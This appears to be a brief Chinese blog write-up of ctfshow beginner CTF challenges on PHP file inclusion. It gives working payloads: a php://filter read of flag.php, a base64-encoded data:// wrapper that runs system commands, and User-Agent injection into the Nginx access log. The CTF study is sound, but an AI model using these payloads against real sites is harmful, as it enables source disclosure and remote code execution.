ctfshow web入门 文件包含

web 78

在文件包含的题目中,php伪协议是非常常用的方法

php伪协议的利用

读取php源码要加base64过滤器

?file=php://filter/convert.base64-encode/resource=flag.php

 

web 79

?file=data://text/plain;base64,<?php system('cat flag.php'); ?>

php给过滤掉了,用data协议执行PHP命令,并且php命令里有php也要base64

为?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

 

web80

日志包含

Nginx日志目录为/var/log/nginx/access.log

ua头中传入<?php system('ls');?>

<?php system('cat f10g.php');?>

 

上一篇:ctfshow信息搜集笔记


下一篇:ctfshow web(非web入门)